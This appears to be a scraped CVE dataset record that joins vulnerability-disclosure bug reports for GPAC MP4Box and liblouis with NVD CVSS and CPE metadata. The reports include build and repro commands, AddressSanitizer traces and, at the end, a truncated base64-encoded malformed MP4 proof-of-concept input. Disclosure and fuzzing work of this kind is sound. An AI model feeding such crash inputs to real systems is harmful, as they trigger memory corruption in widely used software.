Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [x] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ ***Describe the bug*** There is a heap-buffer-overflow bug, which can be triggered via MP4Box+ ASan ***To Reproduce*** Steps to reproduce the behavior: ``` ./configure --cc=clang --cxx=clang++ --enable-sanitizer make -j$(nproc) ./bin/gcc/MP4Box -diso POC ``` Output: ``` [iso file] Box "moof" (start 0) has 3 extra bytes [iso file] Movie fragment but no moov (yet) - possibly broken parsing! [iso file] Box "moof" (start 23) has 3 extra bytes [iso file] Box "moof" (start 34) has 3 extra bytes [iso file] Box "moof" (start 77) has 3 extra bytes [iso file] Box "tref" (start 45) has 4 extra bytes [iso file] Unknown top-level box type 0005hEB ================================================================= ==1787100==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000001012 at pc 0x0000005b4fdc bp 0x7ffde5e08a70 sp 0x7ffde5e08a68 WRITE of size 1 at 0x602000001012 thread T0 #0 0x5b4fdb in gf_base64_encode /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/base_encoding.c:48:13 #1 0x8fdb6b in colr_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:5493:15 #2 0x90c095 in gf_isom_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_funcs.c:2076:2 #3 0x8cf29c in gf_isom_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:135:3 #4 0x539be2 in dump_isom_xml /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/filedump.c:1954:6 #5 0x51939b in mp4boxMain /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/main.c:6155:7 #6 0x7faccbbfc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) #7 0x41fdad in _start (/home/hzheng/workspace/benchmarks/reproduce/gpac/bin/gcc/MP4Box+0x41fdad) 0x602000001012 is located 0 bytes to the right of 2-byte region [0x602000001010,0x602000001012) allocated by thread T0 here: #0 0x4c58ff in malloc /home/hzheng/env/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145:3 #1 0x8fdb37 in gf_malloc /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/alloc.c:150:9 #2 0x8fdb37 in colr_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:5492:20 #3 0x90c095 in gf_isom_box_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_funcs.c:2076:2 #4 0x8cf29c in gf_isom_dump /home/hzheng/workspace/benchmarks/reproduce/gpac/src/isomedia/box_dump.c:135:3 #5 0x539be2 in dump_isom_xml /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/filedump.c:1954:6 #6 0x51939b in mp4boxMain /home/hzheng/workspace/benchmarks/reproduce/gpac/applications/mp4box/main.c:6155:7 #7 0x7faccbbfc0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2) SUMMARY: AddressSanitizer: heap-buffer-overflow /home/hzheng/workspace/benchmarks/reproduce/gpac/src/utils/base_encoding.c:48:13 in gf_base64_encode Shadow bytes around the buggy address: 0x0c047fff81b0: fa fa 07 fa fa fa fd fa fa fa 04 fa fa fa 00 02 0x0c047fff81c0: fa fa fd fa fa fa 00 07 fa fa 00 00 fa fa 00 00 0x0c047fff81d0: fa fa 00 fa fa fa fd fa fa fa 00 04 fa fa 00 00 0x0c047fff81e0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff81f0: fa fa 04 fa fa fa 00 00 fa fa 04 fa fa fa 01 fa =>0x0c047fff8200: fa fa[02]fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8210: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8220: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8230: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8240: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff8250: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==1787100==ABORTING ``` ***Environment*** gpac commit 54e9ed807fd24d83aa051fb097466d8760225401 clang release/12.x ubuntu 20.04 ***POC*** [POC.zip](https://github.com/gpac/gpac/files/8222176/POC.zip) ***Credit*** Han Zheng [NCNIPC of China](http://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/)
[BUG] heap-buffer-overflow in gf_base64_encode
https://api.github.com/repos/gpac/gpac/issues/2138/comments
3
2022-03-10T09:47:43Z
2022-08-03T09:44:25Z
https://github.com/gpac/gpac/issues/2138
1,164,990,736
2,138
3,336
CVE-2022-26981
2022-03-13T18:15:08.343
Liblouis through 3.21.0 has a buffer overflow in compilePassOpcode in compileTranslationTable.c (called, indirectly, by tools/lou_checktable.c).
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/12" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/15" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/16" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/18" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/liblouis/liblouis/issues/1171" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CFD2KIHESDUCNWTEW3USFB5GKTWT624L/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202301-06" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213340" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213342" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213345" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/15" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/16" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2022/Jul/18" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/liblouis/liblouis/issues/1171" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CFD2KIHESDUCNWTEW3USFB5GKTWT624L/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://security.gentoo.org/glsa/202301-06" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213340" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213342" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213345" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://support.apple.com/kb/HT213346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:liblouis:liblouis:*:*:*:*:*:*:*:*", "matchCriteriaId": "03F25854-38F4-4036-A5B1-624ACE32BC55", "versionEndExcluding": null, "versionEndIncluding": "3.21.0", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:36:*:*:*:*:*:*:*", "matchCriteriaId": "5C675112-476C-4D7C-BCB9-A2FB2D0BC9FD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "matchCriteriaId": "F5E4F87A-8003-43EB-99F7-35C82AEA4DC0", "versionEndExcluding": "15.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "matchCriteriaId": "B6FA9FE3-1891-405C-B191-04CAB84ADD46", "versionEndExcluding": "15.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "matchCriteriaId": "BFABC0C7-944C-4B46-A985-8B4F8BF93F54", "versionEndExcluding": "12.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "12.0", "vulnerable": true }, { "criteria": "cpe:2.3:o:apple:tvos:*:*:*:*:*:*:*:*", "matchCriteriaId": "83FC1965-2381-49FF-9521-355D29B28B71", "versionEndExcluding": "15.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "matchCriteriaId": "8EB2AF3C-B2A0-41AD-9C3E-14B220620FF0", "versionEndExcluding": "8.7", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/liblouis/liblouis/issues/1171
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "liblouis", "liblouis" ]
**Describe the bug** There is a global-buffer-overflow bug found in compilePassOpcode, can be triggered via lou_checktable+ ASan **To Reproduce** Steps to reproduce the behavior: ``` export CC=clang && export CFLAGS="-fsanitize=address -g" ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8 ./tools/lou_checktable POC ``` Output: ``` ==17764==ERROR: AddressSanitizer: global-buffer-overflow on address 0x00000102f062 at pc 0x00000051d4ce bp 0x7ffdfad96390 sp 0x7ffdfad96388 WRITE of size 2 at 0x00000102f062 thread T0 #0 0x51d4cd in compilePassOpcode /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 #1 0x50f7bf in compileRule /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:3947:11 #2 0x4ff42b in compileFile /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4660:9 #3 0x4fbbe9 in compileTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4767:9 #4 0x4f9bdf in getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4939:7 #5 0x4f9061 in _lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4848:2 #6 0x4fb51f in lou_getTable /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:4860:2 #7 0x4f4109 in main /benchmark/vulnerable/liblouis/tools/lou_checktable.c:114:16 #8 0x7f6ff64f0bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #9 0x41b699 in _start (/benchmark/vulnerable/liblouis/tools/lou_checktable+0x41b699) 0x00000102f062 is located 0 bytes to the right of global variable 'passRuleDots' defined in 'compileTranslationTable.c:1850:21' (0x102e060) of size 4098 SUMMARY: AddressSanitizer: global-buffer-overflow /benchmark/vulnerable/liblouis/liblouis/compileTranslationTable.c:1896:31 in compilePassOpcode Shadow bytes around the buggy address: 0x0000801fddb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801fddc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801fddd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801fdde0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0000801fddf0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0000801fde00: 00 00 00 00 00 00 00 00 00 00 00 00[02]f9 f9 f9 0x0000801fde10: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000801fde20: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000801fde30: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000801fde40: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 0x0000801fde50: f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 f9 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==17764==ABORTING ``` **System** OS: Ubuntu OS version : can be reproduced in 18.04/20.04 clang version: 12.0.1 (release/12.x) liblouis Version : latest commit 4d73c81aba59cfdd38736b87bac5b0b8c6bd2053 **Credit** Han Zheng [NCNIPC of China](http://www.nipc.org.cn) [Hexhive](http://hexhive.epfl.ch/) **POC** [POC.zip](https://github.com/liblouis/liblouis/files/8184399/POC.zip)
[BUG] global-buffer-overflow in lou_checktable
https://api.github.com/repos/liblouis/liblouis/issues/1171/comments
3
2022-03-04T08:53:12Z
2022-08-03T09:41:02Z
https://github.com/liblouis/liblouis/issues/1171
1,159,399,358
1,171
3,337
CVE-2022-24575
2022-03-14T14:15:07.830
GPAC 1.0.1 is affected by a stack-based buffer overflow through MP4Box.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2058" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/1d9bf402-f756-4583-9a1d-436722609c1e/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2058" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://huntr.dev/bounties/1d9bf402-f756-4583-9a1d-436722609c1e/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:1.0.1:*:*:*:*:*:*:*", "matchCriteriaId": "82DD2D40-0A05-48FD-940D-32B4D8B51AB3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2058
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
``` Proof of Concept Version: MP4Box - GPAC version 1.1.0-DEV-rev1647-gb6f68145e-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --prefix=/home/aidai/fuzzing/gpac/ Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D System information Ubuntu 20.04 focal, AMD EPYC 7742 64-Core @ 16x 2.25GHz poc base64 poc AAAAFHN0eXDoAwAFEHNzc21wNDEAACzTbW9vdgAAAGxtdmhkAAAAIkic2V9InNlhAAFfkAAfXZgA AQAAAQAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAACQAAACppb2RzAAAAABCAgIAZAE///w8B/w6AgIAEAAAABw6A gIAEAAAACAAACAN0cmFrAAAAXHRraGQAAAABSJzZX0ic2V8AAAABAAACAAAfT6AAAAAAAAAAAAAA AAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAABAAAAAALAAAACQAAAAAAefbWRp YQAAACBtZGhkAAAAAEic2V9InNlfAAFfkAAfT6AAAAAAAAAAIWhkbHIAAAAAAAAAAHZpZGUAAAAA AAAAAAAAAAAAAAAHVm1pbmYAAAAUdm1oZAAAAAEAAAAAAAAAAAAAACRkQ0NmAAAAHGRyZWYAAAAA AAAAAQAAAAx1cmwgAAAAAQAABxZzdGJsAAAAtnN0c2QAAAAAAAAAAQAAAKZtcDR2AAAAAAAAAAEA AAAAAAAAAAAAAAAAAAAAALAAkABIAAAASAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAGP//AAAAUGVzZHMAAAAAA4CAgD8AAQAEgICAMSARABVpAANQ4AADBcEFgICAHwAA AbADAAABtQkAAAEAAAABIADIiLqYYfQgsIJCgwcGgICAAQIAAAAYc3R0cwAAAAAAAAABAAABVgAA F3AAAAVsc3RzegAAAAAAAAAAAAABVgAAC+0AAAJhAAACeAAAApwAAAKWAAADxgAABAUAAARfAAAH ewAAB1cAAAsH///99gAAC7AAAAcwAAAHDwAAB0oAAAciAAAElgAABLoAAARsAAAENQAABJUAAAdb AAAG2QAAB4YAAAfUAAAH8gAACEgAAAAAAAAD3gAAD4kAAAS9AAAEvwAAAtYAAAL7AAADpQAABEgA AASAAAADrAAAG+AAAAcZAAAKywAAC3gAAAuGAAAHVAAABzAAAAazAAADywAABLcAAARtAAAE5wAA BOUAAAeNAAAGpQAABrwAAAbiAAAGmgAAByoAAAfxAAAHOAAAFJIAAATUAAAFLgAAAyEAAAMjAAAD KQAAAugAAANdAAAEswAAA9oAAAQkAAAG4gAABo0AAArUAAALUgAACx4AAAvxAAAHzgAABzcAAAbk AAADtAAAA/UAAAQ7AAAEPwAABNUAAAQ+AAAERgAABrcAAAaKAAAHDwAAFWkAAAgZAAAElQAABHAA AAPWAAADtQAABAUAAAQ7AAAEKAAABDIAAAb4AAAGdwAABqEAAAbzAAALOQAAC5sAAAeyAAAIDQAA BzIAAAdqAAAELwAAA/sAAAPHAAAESgAAA0AAAAbqAAAGhgAABssAAAb+AAAHhQAAFMEAAAfHAAAH owAAA+AAAAP/AAADEgAAAzsAAAMjAAAEkAAABC8AAARkAAAHzQAABxoAAAbtAAAKsQAAC5EAAAcD AAAHcQAAB+QAAAdjAAAHVgAAA7AAAAO8AAAEOgAABEsAAASVAAAHTQAAByYAAAalAAAHHQAAFRMA AAeYAAAEmgAABKUAAAKQAAADGAAAA0cAAAP7AAADpAAAA84AAAexAAAICgAAB0kAAAtoAAALAQAA BrcAAAcnAAAHPAAAB6UAAAeGAAAD6QAAA3AAAAOJAAADngAABqUAAAdMAAAHWAAABm8AAAbLAAAG mQAAFPsAAAftAAAD/AAABBoAAAPQAAAENwAABEYAAAQJAAAEYQAABCgAAAeIAAAH2wAAB0UAAAb1 AAAHoQAABqQAAAYqAAAG+gAAB1MAAAcYAAAHMgAABxsaAAbQAAAGogAABrwAAAbpAAAHYwAABxQA AAQ0AAAEOAAAFPsAAAQbAAADrAAAAsMAAAKtAAACswAABJ4AAAQtAAAHOgAABsAAAAcNAAAGqwAA BqAAAArRAAAMBQAAB1EAAAZSAAAGSAAABvEAAAbCAAAD1QAABH4AAATCAAAEugAACBQAAAeQAAAH AQAABycAAAbqAAAG7AAAFNYAAAS3AAAFZQAAAzgAAAMVAAAEGgAABRsAAAVyAAAFNgAABXQAAAYB AAAFYQAABUMAAAVUAAAKfwAACg8AAAnQAAAJTAAABNYAAATwAAAElAAABGoAAARwAAAENwAABKkA AAlmAAAIgAAACJ8AAAkpAAAJLwAAEegAAAW2AAAD9wAAA9oAAAJBAAAB6QAAA4YAABXwAAAEmwAA BjgAAAZEAAAGAQAACaAAAAnYAAAIuwAAB1MAAAeFAAAHgQAABNkAAAS8AAAETwAAAz0AAAayAAAH YAAAB7UAAAi0AAAJVwAACG0AAAgjAAAE+QAAEScAAAUyAAADfQAAAwkAAAHsAAADAgAAA4gAAATt AAAF7QAABOQAAARhAAAIswAACLcAAAnHAAAJWQAACLoAAAmwAAAH4wAAA7oAAAPjAAAEHgAABEEA AARBAAAIKwAAB5IAAAcnAAAHRQAACAoAAAe0AAAIiQAAEkEAAAYmAAAFdgAABK0AAAA8AAAAPAAA AhsAAALqAAAC0QAABWUAAAhfAAAKnQAAAChzdHNjAAAAAAAAAAIAAAABAAAADwAAAAEAAAAXAAAA DAAAAAEAAABsc3RjbwAAAAAAAAAXAAA2/gAAzCUAAWSSAAIEswACm90AAzRvAAPNZAAEbHsABQbL AAWkHgAGPwwABuG3AAd3mAAIFTYACLHgAAlSqQAJ6xgACoORAAsnxAALwLEADF+4AAz3nQANlFsA AABAc3RzcwAAAAAAAAAMAAAAAQAAAB8AAAA9AAAAWwAAAHkAAACXAAAAtQAAANMAAADxAAABDwAA AS0AAAFLAAAJM3RyYWsAAABcdGtoZAAAAABInNlfSJzZXwAAAAIAAAAAAB9PoAAAAAAAAAAAAAAA AAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAByVtZGlh AAAAIG1kaGQAAAAASJzZX0ic2V8AAV+QAB9PoAAAAAAAAAAhaGRscgAAAAAAAAAAaGludAAAAAAA AAAAAAAAAAAAAAbcbWluZgAAABxobWhkAAAAAAXABAQAA1mAAAMVywAAAAAAAAAkZGluZgAAABxk cmVmAAAA5wAAAAEAAAAMdXJsIAAAAAEAAAaUc3RibAAAADRzdHNkAAAAAAAAAAEAAAAkcnRwIAAA AAAAAAABAAEAAQAABbQAAAAMdGltcwABX5AAAAAYc3R0cwAAAAAAAAABAAABVgAAF3AAAAVsc3Rz egAAAAAAAAAAAAABVgAAAJMAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8 AAAAWAAAAFgAAAA8AAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwA AAA8AAAAPAAAADwAAAA8AAAAIAAAAFgAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAA ADwAAAA8AAAAPAAAAFgAAABYAAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAA PAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAg AAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAABYAAAAPAAAADwAAAA8AAAAIAAAACAA AAAgAAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAAACAAAAAgAAEAIAAA ACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAAFgAAAA8AAAAPAAAADwAAAA8AAAA IAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAPAAAACAAAAAg AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAAFgAAAA8AAAAPAAAADwA AAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAi ACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAA PAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8 AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPBUAHDwAAAA8CwAAPAAAADwA AAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAADwAAAAgAAAAIAAA AHT/8wAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAA WAAAADwAAAA8AAAAPAAAADwAAAA8AAAAIAAAACAAAAAgAAAAIAAAADwAAAA8AAAAPFSoXNaITOVt OoaTBlqWvPjPRJE+4WEfmmqnBE4AAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAA8AAAAIAAAACAA AAAgAAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAIAAAAB//3wA8AQAAPAAA ADwAAAA8AAAAPAAAAHQAAAA8AAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAP/gIAAAADwAAAA8AAAA PAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAA8AAAAPAAAADwAAAA8 AAAAPAAAADwAAAA8AAAAIAAAAHQAAAAgAAAAIAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAAACAA AAAgAAAAPAAAADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAACAAAAAgAAAAIAAAACAAAAAgAAAAPAAA ADwAAAA8AAAAPAAAADwAAAA8AAAAPAAAAHQAAAA8AAAAlQAAACAAAAAgAAAAIAAAACAAAAAgAAAA 